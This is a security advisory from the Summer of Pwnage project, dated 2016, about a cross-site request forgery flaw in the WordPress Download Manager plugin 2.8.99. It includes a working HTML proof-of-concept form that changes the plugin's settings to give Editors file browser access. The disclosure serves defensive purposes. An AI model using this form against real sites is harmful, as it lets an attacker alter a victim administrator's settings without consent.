WordPress Download Manager 2.8.99 Cross Site Request Forgery

`------------------------------------------------------------------------  
Cross-Site Request Forgery in WordPress Download Manager Plugin  
------------------------------------------------------------------------  
Burak Kelebek, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Request Forgery vulnerability has been found in the  
WordPress Download Manager Plugin. By using this vulnerability an  
attacker can change confidential settings of the plugin.  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160722-0005  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on WordPress Download Manager version  
2.8.99.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
There is currently no fix available.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html  
  
The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below.  
Proof of concept  
  
The proof of concept below gives file browser access to a user with Editor privileges:  
  
<html>  
<body>  
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">  
<input type="hidden" name="task" value="wdm_save_settings"/>  
<input type="hidden" name="action" value="wdm_settings"/>  
<input type="hidden" name="section" value="basic"/>  
<input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>  
<input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>  
"/>  
<input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>  
<input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>  
<input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>  
<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>  
<input type="hidden" name="__wpdm_download_speed" value="4096"/>  
<input type="hidden" name="__wpdm_download_resume" value="1"/>  
<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>  
<input type="hidden" name="__wpdm_open_in_browser" value="0"/>  
<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>  
<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>  
<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>  
<input type="hidden" name="__wpdm_login_url" value=""/>  
<input type="hidden" name="__wpdm_register_url" value=""/>  
<input type="hidden" name="__wpdm_user_dashboard" value=""/>  
<input type="submit"/>  
</form>  
</body>  
</html>  
  
  
------------------------------------------------------------------------  
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its  
goal is to contribute to the security of popular, widely used OSS  
projects in a fun and educational way.  
`